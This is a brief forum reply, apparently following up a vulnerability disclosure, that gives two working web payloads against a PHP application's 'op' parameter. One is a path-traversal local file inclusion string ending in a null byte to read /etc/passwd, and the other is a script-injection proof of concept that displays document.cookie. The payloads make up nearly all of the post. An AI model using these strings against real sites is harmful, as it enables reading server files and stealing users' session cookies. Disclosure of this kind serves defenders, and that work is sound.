One thing i forgot, a %00 must be included at the end of the LFI, IE: index.php?op=../../../../../../../etc/passwd%00

And ?op is vulnerable to a xss attack, IE:

index.php?op=<script>alert(document.cookie)</script>

Ignacio.

[ reply ]